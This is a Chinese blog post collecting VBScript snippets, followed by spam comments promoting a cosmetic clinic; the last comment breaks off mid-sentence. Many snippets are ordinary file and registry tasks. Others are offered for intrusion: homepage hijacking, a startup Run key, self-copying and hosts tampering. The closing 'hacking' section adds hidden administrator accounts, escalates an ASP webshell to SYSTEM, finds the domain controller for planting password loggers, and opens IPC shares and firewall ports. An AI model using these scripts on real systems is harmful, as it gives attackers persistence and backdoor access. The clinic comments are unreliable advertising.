VBS脚本常用经典代码收集

Feb 1

闻达 , 13:51 , 电脑技巧 , 评论(218) , 引用(0) , 阅读(32228) , Via 本站原创

最近在玩系统封装，顺便学了下VBS，发现VBS功能还是比较强大的（做流氓软件啊啥的-0-），以下是我在互联网上收集到的经典代码，供大家参考！

1. 计算

2. 处理文件和文件夹

3. 管理Windows

4. 处理Word, Excel, PowerPoint等Office文档

5. 嵌入网页，驱动dHTML

6. 编写HTTP通信

7. 调用系统功能（COM组件），比如说语音说话

8. 分析HTML, XML

9. 调用命令行并分析返回结果

10. 处理图片

11. 自动化按键

12. 调用Windows Media Player并管理

13. 调用Windows Live Messenger并管理

14. 服务端技术：Active Server Page (ASP)

15. 脚本病毒

16. 处理数据库

VBS获取系统安装路径

先定义这个变量是获取系统安装路径的，然后我们用”&strWinDir&”调用这个变量。

set WshShell = WScript.CreateObject("WScript.Shell")

strWinDir = WshShell.ExpandEnvironmentStrings("%WinDir%")VBS获取C:Program Files路径msgbox CreateObject("WScript.Shell").ExpandEnvironmentStrings("%ProgramFiles%")

VBS获取C:Program FilesCommon Files路径

msgbox CreateObject("WScript.Shell").ExpandEnvironmentStrings("%CommonProgramFiles%")

给桌面添加网址快捷方式

set gangzi = WScript.CreateObject("WScript.Shell")

strDesktop = gangzi.SpecialFolders("Desktop")

set oShellLink = gangzi.CreateShortcut(strDesktop & "Internet Explorer.lnk")

oShellLink.TargetPath = "http://www.fendou.info"

oShellLink.Description = "Internet Explorer"

oShellLink.IconLocation = "%ProgramFiles%Internet Exploreriexplore.exe, 0"

oShellLink.Save

给收藏夹添加网址

Const ADMINISTRATIVE_TOOLS = 6

Set objShell = CreateObject("Shell.Application")

Set objFolder = objShell.Namespace(ADMINISTRATIVE_TOOLS)

Set objFolderItem = objFolder.Self

Set objShell = WScript.CreateObject("WScript.Shell")

strDesktopFld = objFolderItem.Path

Set objURLShortcut = objShell.CreateShortcut(strDesktopFld & "奋斗Blog.url")

objURLShortcut.TargetPath = "http://www.fendou.info/"

objURLShortcut.Save

删除指定目录指定后缀文件

On Error Resume Next

Set fso = CreateObject("Scripting.FileSystemObject")

fso.DeleteFile "C:*.vbs", True

Set fso = Nothing

VBS改主页

Set oShell = CreateObject("WScript.Shell")

oShell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.fendou.info"

VBS加启动项

Set oShell=CreateObject("Wscript.Shell")

oShell.RegWrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRuncmd","cmd.exe"

VBS复制自己

set copy1=createobject("scripting.filesystemobject")

copy1.getfile(wscript.scriptfullname).copy("c:huan.vbs")

复制自己到C盘的huan.vbs(复制本vbs目录下的game.exe文件到c盘的gangzi.exe)

set copy1=createobject("scripting.filesystemobject")

copy1.getfile("game.exe").copy("c:gangzi.exe")

VBS获取系统临时目录

Dim fso

Set fso = CreateObject("Scripting.FileSystemObject")

Dim tempfolder

Const TemporaryFolder = 2

Set tempfolder = fso.GetSpecialFolder(TemporaryFolder)

Wscript.Echo tempfolder

就算代码出错依然继续执行

On Error Resume Next

VBS打开网址

Set objShell = CreateObject("Wscript.Shell")

objShell.Run("http://www.fendou.info/")

VBS发送邮件

NameSpace = "http://schemas.microsoft.com/cdo/configuration/"

Set Email = CreateObject("CDO.Message")

Email.From = "发件@qq.com"

Email.To = "收件@qq.com"

Email.Subject = "Test sendmail.vbs"

Email.Textbody = "OK!"

Email.AddAttachment "C:1.txt"

With Email.Configuration.Fields

.Item(NameSpace&"sendusing") = 2

.Item(NameSpace&"smtpserver") = "smtp.邮件服务器.com"

.Item(NameSpace&"smtpserverport") = 25

.Item(NameSpace&"smtpauthenticate") = 1

.Item(NameSpace&"sendusername") = "发件人用户名"

.Item(NameSpace&"sendpassword") = "发件人密码"

.Update

End With

Email.Send

VBS结束进程

strComputer = "."

Set objWMIService = GetObject _

("winmgmts:\" & strComputer & "rootcimv2")

Set colProcessList = objWMIService.ExecQuery _

("Select * from Win32_Process Where Name = 'Rar.exe'")

For Each objProcess in colProcessList

objProcess.Terminate()

Next

VBS隐藏打开网址(部分浏览器无法隐藏打开，而是直接打开，适合主流用户使用)

createObject("wscript.shell").run "iexplore http://www.fendou.info/",0

兼容所有浏览器，使用IE的绝对路径+参数打开，无法用函数得到IE安装路径，只用函数得到了Program Files路径，应该比上面的方法好，但是两种方法都不是绝对的。

Set objws=WScript.CreateObject("wscript.shell")

objws.Run """C:Program FilesInternet Exploreriexplore.exe""www.baidu.com",vbhide

VBS遍历硬盘删除指定文件名

On Error Resume Next

Dim fPath

strComputer = "."

Set objWMIService = GetObject _

("winmgmts:\" & strComputer & "rootcimv2")

Set colProcessList = objWMIService.ExecQuery _

("Select * from Win32_Process Where Name = 'gangzi.exe'")

For Each objProcess in colProcessList

objProcess.Terminate()

Next

Set objWMIService = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate}!\" & strComputer & "rootcimv2")

Set colDirs = objWMIService. _

ExecQuery("Select * from Win32_Directory where name LIKE '%c:%' or name LIKE '%d:%' or name LIKE '%e:%' or name LIKE '%f:%' or name LIKE '%g:%' or name LIKE '%h:%' or name LIKE '%i:%'")

Set objFSO = CreateObject("Scripting.FileSystemObject")

For Each objDir in colDirs

fPath = objDir.Name & "gangzi.exe"

objFSO.DeleteFile(fPath), True

Next

VBS获取网卡MAC地址

Dim mc,mo

Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")

For Each mo In mc

If mo.IPEnabled=True Then

MsgBox "本机网卡MAC地址是: " & mo.MacAddress

Exit For

End If

Next

VBS获取本机注册表主页地址

Set reg=WScript.CreateObject("WScript.Shell")

startpage=reg.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page")

MsgBox startpage

VBS遍历所有磁盘的所有目录，找到所有.txt的文件，然后给所有txt文件最底部加一句话

On Error Resume Next

Set fso = CreateObject("Scripting.FileSystemObject")

Co = VbCrLf & "路过。。。"

For Each i In fso.Drives

If i.DriveType = 2 Then

GF fso.GetFolder(i & "")

End If

Next

Sub GF(fol)

Wh fol

Dim i

For Each i In fol.SubFolders

GF i

Next

End Sub

Sub Wh(fol)

Dim i

For Each i In fol.Files

If LCase(fso.GetExtensionName(i)) = "shtml" Then

fso.OpenTextFile(i,8,0).Write Co

End If

Next

End Sub

获取计算机所有盘符

Set fso=CreateObject("scripting.filesystemobject")

Set objdrives=fso.Drives '取得当前计算机的所有磁盘驱动器

For Each objdrive In objdrives '遍历磁盘

MsgBox objdrive

Next

VBS给本机所有磁盘根目录创建文件

On Error Resume Next

Set fso=CreateObject("Scripting.FileSystemObject")

Set gangzis=fso.Drives '取得当前计算机的所有磁盘驱动器

For Each gangzi In gangzis '遍历磁盘

Set TestFile=fso.CreateTextFile(""&gangzi&"新建文件夹.vbs",Ture)

TestFile.WriteLine("By www.gangzi.org")

TestFile.Close

Next

VBS遍历本机全盘找到所有123.exe，然后给他们改名321.exe

set fs = CreateObject("Scripting.FileSystemObject")

for each drive in fs.drives

fstraversal drive.rootfolder

next

sub fstraversal(byval this)

for each folder in this.subfolders

fstraversal folder

next

set files = this.files

for each file in files

if file.name = "123.exe" then file.name = "321.exe"

next

end sub

VBS写入代码到粘贴板（先说明一下，VBS写内容到粘贴板，网上千篇一律都是通过InternetExplorer.Application对象来实现，但是缺点是在默认浏览器为非IE中会弹出浏览器，所以费了很大的劲找到了这个代码来实现）

str=“这里是你要复制到剪贴板的字符串”

Set ws = wscript.createobject("wscript.shell")

ws.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0,true

QQ自动发消息

On Error Resume Next

str="我是笨蛋/qq"

Set WshShell=WScript.CreateObject("WScript.Shell")

WshShell.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0

WshShell.run "tencent://message/?Menu=yes&uin=20016964&Site=&Service=200&sigT=2a39fb276d15586e1114e71f7af38e195148b0369a16a40fdad564ce185f72e8de86db22c67ec3c1",0,true

WScript.Sleep 3000

WshShell.SendKeys "^v"

WshShell.SendKeys "%s"

VBS隐藏文件

Set objFSO = CreateObject("Scripting.FileSystemObject")

Set objFile = objFSO.GetFile("F:软件大赛show.txt")

If objFile.Attributes = objFile.Attributes AND 2 Then

objFile.Attributes = objFile.Attributes XOR 2

End If

VBS生成随机数（521是生成规则，不同的数字生成的规则不一样，可以用于其它用途）

Randomize 521

point=Array(Int(100*Rnd+1),Int(1000*Rnd+1),Int(10000*Rnd+1))

msgbox join(point,"")

VBS删除桌面IE图标（非快捷方式）

Set oShell = CreateObject("WScript.Shell")

oShell.RegWrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoInternetIcon",1,"REG_DWORD"

VBS获取自身文件名

Set fso = CreateObject("Scripting.FileSystemObject")

msgbox WScript.ScriptName

VBS读取Unicode编码的文件

Set objFSO = CreateObject("Scripting.FileSystemObject")

Set objFile = objFSO.OpenTextFile("gangzi.txt",1,False,-1)

strText = objFile.ReadAll

objFile.Close

Wscript.Echo strText

VBS读取指定编码的文件（默认为uft-8）gangzi变量是要读取文件的路径

set stm2 =createobject("ADODB.Stream")

stm2.Charset = "utf-8"

stm2.Open

stm2.LoadFromFile gangzi

readfile = stm2.ReadText

MsgBox readfile

VBS禁用组策略

Set oShell = CreateObject("WScript.Shell")

oShell.RegWrite "HKEY_CURRENT_USERSoftwarePoliciesMicrosoftMMCRestrictToPermittedSnapins",1,"REG_DWORD"

VBS写指定编码的文件（默认为uft-8）gangzi变量是要读取文件的路径，gangzi2是内容变量

gangzi="1.txt"

gangzi2="www.gangzi.org"

Set Stm1 = CreateObject("ADODB.Stream")

Stm1.Type = 2

Stm1.Open

Stm1.Charset = "UTF-8"

Stm1.Position = Stm1.Size

Stm1.WriteText gangzi2

Stm1.SaveToFile gangzi,2

Stm1.Close

set Stm1 = nothing

VBS获取当前目录下所有文件夹名字（不包括子文件夹）

Set fso=CreateObject("scripting.filesystemobject")

Set f=fso.GetFolder(fso.GetAbsolutePathName("."))

Set folders=f.SubFolders

For Each fo In folders

wsh.echo fo.Name

Next

Set folders=Nothing

Set f=nothing

Set fso=nothing

VBS获取指定目录下所有文件夹名字（包括子文件夹）

Dim t

Set fso=WScript.CreateObject("scripting.filesystemobject")

Set fs=fso.GetFolder("d:")

WScript.Echo aa(fs)

Function aa(n)

Set f=n.subfolders

For Each uu In f

Set op=fso.GetFolder(uu.path)

t=t & vbcrlf & op.path

Call aa(op)

Next

aa=t

End function

VBS创建.URL文件（IconIndex参数不同的数字代表不同的图标，具体请参照SHELL32.dll里面的所有图标）

set fso=createobject("scripting.filesystemobject")

qidong=qidong&"[InternetShortcut]"&Chr(13)&Chr(10)

qidong=qidong&"URL=http://www.fendou.info"&Chr(13)&Chr(10)

qidong=qidong&"IconFile=C:WINDOWSsystem32SHELL32.dll"&Chr(13)&Chr(10)

qidong=qidong&"IconIndex=130"&Chr(13)&Chr(10)

Set TestFile=fso.CreateTextFile("qq.url",Ture)

TestFile.WriteLine(qidong)

TestFile.Close

VBS写hosts（没写判断，无论存不存在都追加底部）

Set fs = CreateObject("Scripting.FileSystemObject")

path = ""&fs.GetSpecialFolder(1)&"driversetchosts"

Set f = fs.OpenTextFile(path,8,TristateFalse)

f.Write ""&vbcrlf&"127.0.0.1 www.g.cn"&vbcrlf&"127.0.0.1 g.cn"

f.Close

VBS读取出HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace 下面所有键的名字并循环输出

Const HKLM = &H80000002

strPath = "SOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace"

Set oreg = GetObject("Winmgmts:rootdefault:StdRegProv")

oreg.EnumKey HKLM,strPath,arr

For Each x In arr

WScript.Echo x

Next

VBS创建txt文件

Dim fso,TestFile

Set fso=CreateObject("Scripting.FileSystemObject")

Set TestFile=fso.CreateTextFile("C:hello.txt",Ture)

TestFile.WriteLine("Hello,World!")

TestFile.Close

VBS创建文件夹

Dim fso,fld

Set fso=CreateObject("Scripting.FileSystemObject")

Set fld=fso.CreateFolder("C:newFolder")

VBS判断文件夹是否存在

Dim fso,fld

Set fso=CreateObject("Scripting.FileSystemObject")

If (fso.FolderExists("C:newFolder")) Then

msgbox("Folder exists.")

else

set fld=fso.CreateFolder("C:newFolder")

End If

VBS使用变量判断文件夹

Dim fso,fld

drvName="C:"

fldName="newFolder"

Set fso=CreateObject("Scripting.FileSystemObject")

If (fso.FolderExists(drvName&fldName)) Then

msgbox("Folder exists.")

else

set fld=fso.CreateFolder(drvName&fldName)

End If

VBS加输入框

Dim fso,TestFile,fileName,drvName,fldName

drvName=inputbox("Enter the drive to save to:","Drive letter")

fldName=inputbox("Enter the folder name:","Folder name")

fileName=inputbox("Enter the name of the file:","Filename")

Set fso=CreateObject("Scripting.FileSystemObject")

If(fso.FolderExists(drvName&fldName))Then

msgbox("Folder exists")

Else

Set fld=fso.CreateFolder(drvName&fldName)

End If

Set TestFile=fso.CreateTextFile(drvName&fldName&""&fileName&".txt",True)

TestFile.WriteLine("Hello,World!")

TestFile.Close

VBS检查是否有相同文件

Dim fso,TestFile,fileName,drvName,fldName

drvName=inputbox("Enter the drive to save to:","Drive letter")

fldName=inputbox("Enter the folder name:","Folder name")

fileName=inputbox("Enter the name of the file:","Filename")

Set fso=CreateObject("Scripting.FileSystemObject")

If(fso.FolderExists(drvName&fldName))Then

msgbox("Folder exists")

Else

Set fld=fso.CreateFolder(drvName&fldName)

End If

If(fso.FileExists(drvName&fldName&""&fileName&".txt"))Then

msgbox("File already exists.")

Else

Set TestFile=fso.CreateTextFile(drvName&fldName&""&fileName&".txt",True)

TestFile.WriteLine("Hello,World!")

TestFile.Close

End If

VBS改写、追加文件

Dim fso,openFile

Set fso=CreateObject("Scripting.FileSystemObject")

Set openFile=fso.OpenTextFile("C:test.txt",2,True) '1表示只读，2表示可写，8表示追加

openFile.Write "Hello World!"

openFile.Close

VBS读取文件 ReadAll 读取全部

Dim fso,openFile

Set fso=CreateObject("Scripting.FileSystemObject")

Set openFile=fso.OpenTextFile("C:test.txt",1,True)

MsgBox(openFile.ReadAll)

VBS读取文件 ReadLine 读取一行

Dim fso,openFile

Set fso=CreateObject("Scripting.FileSystemObject")

Set openFile=fso.OpenTextFile("C:test.txt",1,True)

MsgBox(openFile.ReadLine())

MsgBox(openFile.ReadLine()) '如果读取行数超过文件的行数，就会出错

VBS读取文件 Read 读取n个字符

Dim fso,openFile

Set fso=CreateObject("Scripting.FileSystemObject")

Set openFile=fso.OpenTextFile("C:test.txt",1,True)

MsgBox(openFile.Read(2)) '如果超出了字符数，不会出错。

VBS删除文件

Dim fso

Set fso=CreateObject("Scripting.FileSystemObject")

fso.DeleteFile("C:test.txt")

VBS删除文件夹

Dim fso

Set fso=CreateObject("Scripting.FileSystemObject")

fso.DeleteFolder("C:newFolder") '不管文件夹中有没有文件都一并删除

VBS连续创建文件

Dim fso,TestFile

Set fso=CreateObject("Scripting.FileSystemObject")

For i=1 To 10

Set TestFile=fso.CreateTextFile("C:hello"&i&".txt",Ture)

TestFile.WriteLine("Hello,World!")

TestFile.Close

Next

VBS根据计算机名随机生成字符串

set ws=createobject("wscript.shell")

set wenv=ws.environment("process")

RDA=wenv("computername")

Function UCharRand(n)

For i=1 to n

Randomize ASC(MID(RDA,1,1))

temp = cint(25*Rnd)

temp = temp +65

UCharRand = UCharRand & chr(temp)

Next

End Function

msgbox UCharRand(LEN(RDA))

VBS根据mac生成序列号

Function Encode(strPass)

Dim i, theStr, strTmp

For i = 1 To Len(strPass)

strTmp = Asc(Mid(strPass, i, 1))

theStr = theStr & Abs(strTmp)

Next

strPass = theStr

theStr = ""

Do While Len(strPass) > 16

strPass = JoinCutStr(strPass)

Loop

For i = 1 To Len(strPass)

strTmp = CInt(Mid(strPass, i, 1))

strTmp = IIf(strTmp > 6, Chr(strTmp + 60), strTmp)

theStr = theStr & strTmp

Next

Encode = theStr

End Function

Function JoinCutStr(str)

Dim i, theStr

For i = 1 To Len(str)

If Len(str) – i = 0 Then Exit For

theStr = theStr & Chr(CInt((Asc(Mid(str, i, 1)) + Asc(Mid(str, i +1, 1))) / 2))

i = i + 1

Next

JoinCutStr = theStr

End Function

Function IIf(var, val1, val2)

If var = True Then

IIf = val1

Else

IIf = val2

End If

End Function

Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")

For Each mo In mc

If mo.IPEnabled=True Then

theStr = mo.MacAddress

Exit For

End If

Next

Randomize Encode(theStr)

rdnum=Int(10*Rnd+5)

Function allRand(n)

For i=1 to n

Randomize Encode(theStr)

temp = cint(25*Rnd)

If temp mod 2 = 0 then

temp = temp + 97

ElseIf temp < 9 then

temp = temp + 48

Else

temp = temp + 65

End If

allRand = allRand & chr(temp)

Next

End Function

msgbox allRand(rdnum)

VBS自动连接adslDim Wsh

Set Wsh = WScript.CreateObject("WScript.Shell")

wsh.run "Rasdial 连接名字账号密码",false,1

VBS自动断开ADSL

Dim Wsh

Set Wsh = WScript.CreateObject("WScript.Shell")

wsh.run "Rasdial /DISCONNECT",false,1

VBS每隔3秒自动更换IP并打开网址实例（值得一提的是，下面这个代码中每次打开的网址都是引用同一个IE窗口，也就是每次打开的是覆盖上次打开的窗口，如果需要每次打开的网址都是新窗口，直接使用run就可以了）

Dim Wsh

Set Wsh = WScript.CreateObject("WScript.Shell")

Set oIE = CreateObject("InternetExplorer.Application")

for i=1 to 5

wsh.run "Rasdial /DISCONNECT",false,1

wsh.run "Rasdial 连接名字账号密码",false,1

oIE.Navigate "http://www.ip138.com/?"&i&""

Call SynchronizeIE

oIE.Visible = True

next

Sub SynchronizeIE

On Error Resume Next

Do While(oIE.Busy)

WScript.Sleep 3000

Loop

End Sub

用VBS来加管理员帐号在注入过程中明明有了sa帐号，但是由于net.exe和net1.exe被限制，或其它的不明原因，总是加不了管理员帐号。VBS在活动目录（adsi）部份有一个winnt对像，可以用来管理本地资源，可以用它不依靠cmd等命令来加一个管理员，详细代码如下：

set wsnetwork=CreateObject("WSCRIPT.NETWORK")

os="WinNT://"&wsnetwork.ComputerName

Set ob=GetObject(os) '得到adsi接口,绑定

Set oe=GetObject(os&"/Administrators,group") '属性,admin组

Set od=ob.Create("user","lcx") '建立用户

od.SetPassword "123456" '设置密码

od.SetInfo '保存

Set of=GetObject(os&"/lcx",user) '得到用户

oe.add os&"/lcx"

这段代码如果保存为1.vbs，在cmd下运行，格式: cscript 1.vbs的话，会在当前系统加一个名字为lcx，密码为123456的管理员。当然，你可以用记事本来修改里边的变量lcx和123456，改成你喜欢的名字和密码值。

用vbs来列虚拟主机的物理目录有时旁注入侵成功一个站，拿到系统权限后，面对上百个虚拟主机，怎样才能更快的找到我们目标站的物理目录呢？一个站一个站翻看太累，用系统自带的adsutil.vbs吧又感觉好像参数很多，有点无法下手的感觉，试试我这个脚本吧，代码如下：

Set ObjService=GetObject("IIS://LocalHost/W3SVC")

For Each obj3w In objservice

If IsNumeric(obj3w.Name) Then

sServerName=Obj3w.ServerComment

Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")

ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf

End If

Next

WScript.Echo ListAllWeb

Set ObjService=Nothing

WScript.Quit

运行cscript 2.vbs后，就会详细列出IIS里的站点ID、描述、及物理目录，是不是代码少很多又方便呢？

用VBS快速找到内网域的主服务器面对域结构的内网，可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码，整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上，如果能搞定其中的一台或几台，放个密码记录器之类，相信总有一天你会拿到密码。主域服务器当然是其中最重要一台了，如何在成千台机器里判断出是哪一台呢？dos命令像net group “domain admins” /domain可以做为一个判断的标准，不过vbs也可以做到的，这仍然属于adsi部份的内容，代码如下：

set obj=GetObject("LDAP://rootDSE")

wscript.echo obj.servername

只用这两句代码就足够了，运行cscript 3.vbs，会有结果的。当然，无论是dos命令或vbs，你前提必须要在域用户的权限下。好比你得到了一个域用户的帐号密码，你可以用 psexec.exe -u -p cmd.exe这样的格式来得到域用户的shell，或你的木马本来就是与桌面交互的，登陆你木马shell的又是域用户，就可以直接运行这些命令了。vbs的在入侵中的作用当然不只这些，当然用js或其它工具也可以实现我上述代码的功能；不过这个专栏定下的题目是vbs在hacking中的妙用，所以我们只提vbs。写完vbs这部份我和其它作者会在以后的专栏继续策划其它的题目，争取为读者带来好的有用的文章。

WebShell提权用的VBS代码asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限，代码如下asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限，代码如下:

set wsh=createobject("wscript.shell") '创建一个wsh对象

a=wsh.run ("cmd.exe /c cscript.exe C:InetpubAdminScriptsadsutil.vbs set /W3SVC/InProcessIsapiApps C:WINNTsystem32inetsrvhttpext.dll C:WINNTsystem32inetsrvhttpodbc.dll C:WINNTsystem32inetsrvssinc.dll C:WINNTsystem32msw3prt.dll C:winntsystem32inetsrvasp.dll",0) '加入asp.dll到InProcessIsapiApps中

将其保存为vbs的后缀,再上传到服务上，然后利用asp木马执行这个vbs文件后。再试试你的asp木马吧，你会发现自己己经是system权限了

VBS开启ipc服务和相关设置

Dim OperationRegistry

Set OperationRegistry=WScript.CreateObject("WScript.Shell")

OperationRegistry.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaforceguest",0

Set wsh3=wscript.createobject("wscript.shell")

wsh3.Run "net user helpassistant 123456",0,false

wsh3.Run "net user helpassistant /active",0,false

wsh3.Run "net localgroup administrators helpassistant /add",0,false

wsh3.Run "net start Lanmanworkstation /y",0,false

wsh3.Run "net start Lanmanserver /y",0,false

wsh3.Run "net start ipc$",0,True

wsh3.Run "net share c$=c:",0,false

wsh3.Run "netsh firewall set notifications disable",0,True

wsh3.Run "netsh firewall set portopening TCP 139 enable",0,false

wsh3.Run "netsh firewall set portopening UDP 139 enable",0,false

wsh3.Run "netsh firewall set portopening TCP 445 enable",0,false

wsh3.Run "netsh firewall set portopening UDP 445 enable",0,false

VBS时间判断代码

Digital=time

hours=Hour(Digital)

minutes=Minute(Digital)

seconds=Second(Digital)

if (hours<6) then

dn="凌辰了，还没睡啊？"

end if

if (hours>=6) then

dn="早上好！"

end if

if (hours>12) then

dn="下午好！"

end if

if (hours>18) then

dn="晚上好！"

end if

if (hours>22) then

dn="不早了，夜深了，该睡觉了！"

end if

if (minutes<=9) then

minutes="0" & minutes

end if

if (seconds<=9) then

seconds="0" & seconds

end if

ctime=hours & ":" & minutes & ":" & seconds & " " & dn

Msgbox ctime

VBS注册表读写

Dim OperationRegistry , mynum

Set OperationRegistry=WScript.CreateObject("WScript.Shell")

mynum = 9

mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaforceguest")

MsgBox("before forceguest = "&mynum)

OperationRegistry.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaforceguest",0

mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaforceguest")

MsgBox("after forceguest = "&mynum)

VBS运行后删除自身代码

dim fso,f

Set fso = CreateObject("Scripting.FileSystemObject")

f = fso.DeleteFile(WScript.ScriptName)

WScript.Echo( WScript.ScriptName)

Tags: vbs , 代码

-----------闻达誓死捍卫你的评论权-------------

2012/03/20 14:49 liuabcd123

女人的美丽，需要自己的成全
我是一名艺校的学生，我叫李静，我学的是表演，我的梦想是当个好演员，把每个角色都能演的生动，逼真，好像我就是戏里的那个人。艺校里的男女比例严重不协调，美女如云，数不胜数。而男生就像国宝大熊猫一样稀少，在艺校里长的一般的女孩，或是差一点的根本就是没有男人缘，戏份更是少，没有人愿意和你搭戏。作为个演员没有戏演就意味着没有饭吃，戏多的人就希望自己能演个主角，然而现实却是残酷的，哪有那么多的主角可以让我们演，我现在只是为多演几部戏而不懈的努力着。我算是中等个头166CM，最让我满意的就是身材，不说是魔鬼身材，却也是凹凸有致，唯一欠缺的就是有个水肿脸，胖胖的，我原本一双好看的大眼睛也挤小了，双眼皮也不明显，每次化妆时，眼影总是打不好。看背影还好，正面就有点对不起这么好的身材了，简直就是个“背影杀手”。
  为此，老师都对我很无奈，让我演主角对不起观众，不让我演又对不起我的演技，着实让人郁闷。以前我也没太在意，以为戏演的好一点，还是会有人找我的，直到那次的事情，我才决定改造一下自己。那是大三的时候，有一次老师拿了一个剧本让我们看一下，也没说让谁演主角，就是让我们熟悉一下整个戏，我当时就很喜欢戏中的主角角色，所有就很想演，倒不是因为她是主角，纯粹是那个角色的性格和我很像，我很想看我到底能演到什么程度，当我向老师申请的时候，老师却告诉我已经有安排了，是我们专业有名的美女潇潇，但是在我的印象里，她的戏演得很一般啊，老师又告诉我，女主角是一个美丽，有气质并且善良的女孩，就外表来说潇潇很合适。我也看了剧本，也知道老师没有骗我，不得不承认她的确比我适合，我的心情槽糕透了，但却只能认命。
  后来潇潇因为拍了那部戏受到不少好评，还连续接下了好几部戏，原来我错失的不仅仅是一部戏，还有一次又一次的机会。于是我下定决心去弄一下脸，我本来就不是很难看，只是脸上肉多了点，我想应该从瘦脸开始，于是我四处打听瘦脸的方法，并在网上查看相关资料，后来知道了口碑很好的重庆超雅美容医院里的超声波瘦脸，无痛，不反弹，，恢复快。我心动了，我决定去试试。
  来到重庆超雅美容医院，是所长梁医生接待了我，我问了一下是不是真的不反弹，而且恢复的快。梁医生仔仔细细的把这个手术的情况原原本本的和我讲了一遍，弄的我有点不好意思，好像怀疑人家的技术似的，但说实在的听了梁医生的介绍之后，我心里的大石头才落了地。当天我就办了手续，进行了手术，刚开始时我有点紧张，医生安慰我：“不用害怕，一会就好了，相信我们！”我就让自己放松点，配合医生的手术，感觉到脸上特别舒服，像按摩一样的感觉，最重要的是整个过程我都没有感觉到疼，手术完成后，我连忙拿出包包里的镜子照了照，果然是名不虚传，皮肤像是做了SPA一样，特别的紧致而且有弹性，最主要的是脸上也有了些许的轮廓，医生说再恢复一段时间效果会更明显。
   回到学校后，不到一个月的时间，我的脸就变小了很多，大眼睛也显的特别的漂亮，整个人给人一种不一样的感觉，再也不是“背影杀手”，而是个实实在在的美女了。后来老师问我，我还把整件事的来龙去脉原原本本的告诉了他，老师还说我做得对，现在整容已经不是什么新鲜事了，为了以后的事业，都是可以接受的。我也觉得是，虽然我错过了上次的机会，但我相信，下一次机会我一定会牢牢的把握住，成全自己的梦想，也成全自己的美丽。

2012/03/20 14:48 liuabcd123

如何预防肿眼泡，如何去除肿眼泡
很多职业女性在早晨起床的时候都会后悔昨天加班熬夜，因为眼睛肿了，那么肿眼泡要怎么处理呢？重庆超雅医学美容研究所的所长梁杰医生介绍了肿眼泡一般的形成原理和去除方法。梁医生介绍说，肿眼泡分为两种，一种是天生的，一般推荐客户去做手术，另一种是后天的，比如熬夜、饮水过多、睡觉姿势不对、哭泣早晨的，如果正常情况下眼睛不是肿的，某些时刻水肿的话，是比较容易处理的，比如按摩眼部，促进血液循环可以减少水肿，或者用冰牛奶敷在眼睛周围，还有一些食补的方法可以去除眼袋，详细可以参照梁医生的另一篇博客。在这里梁医生要提醒大家的是，中医传统理论中有望闻问切四项，望诊的一个分支就是面诊，有经验的医生看到求诊者的眼睛就知道身体是不是有隐疾，眼睛肿的话往往是肾脏功能的问题，如果在不熬夜不多喝水的情况下依然常常肿眼泡的话建议去医院进行身体检查。梁医生介绍了如何在熬夜工作的时候防止肿眼泡的发生，很多职业女性之所以会有肿眼泡就是因为熬夜对着电脑打字或者书写文件，在工作的过程中可以保持这样的习惯一，稍稍用力眨眼，之后凝视远方的一个具体目标。二，头部固定不动，眼睛从左转到右再从右转到左，三，和上一个方法相同，头不动，眼睛尽最大努力向上看，到最大限度的时候再相反向下看最后，眼睛尽量睁大，然后再用力闭眼，以上的几种方法类似眼睛草，核心思想就是加大眼部肌肉的运动量，加强血液循环，减少水肿产生的可能性。以上动作可以每个小时做三到五次，第二天就不容易发生肿眼泡了。第二种方法就是借助手，用大拇指食指对眼部周围进行按压，可是适度来回揉动，这样可以增强血液循环，同时对视力的保持有好处。以上两种预防方法之外，梁医生介绍说，尽量少喝酒、吃清淡口味的食物也会减少肿眼睛的发生。最后梁医生介绍说，以上的方法都是如何对肿眼泡进行预防，但是如果是长期的、顽固性的肿眼泡的话就建议去整形医院进行诊治，如果是上眼睑肿的比较厉害，可以将眼轮匝肌适度削薄，或者将里面的脂肪进行手术剪除，目前很多医院都可以提供类似的手术，比如内路、外路手术，抽脂等等，可是开刀手术往往会在皮肤表面留下疤痕，也很难将脂肪完全清楚，恢复的时间也比较长，恢复阶段容易感染，如果是要上眼睑眼轮匝肌缩短的话，有可能导致眼轮匝肌切除部分过大，会产生眼睛无法完全闭合的风险。抽脂就是在眼睑隐蔽处开一个刀口，将导管插入，将里面的脂肪通过压力抽出来，这种方法容易导致皮肤的凹凸不平，而且也面临开刀同样的风险，有可能恢复时间长、出现感染等等，在这里，梁医生推荐的是超声波去眼袋的方式，可是将长期顽固性的眼袋完全除去，具体方法就是用一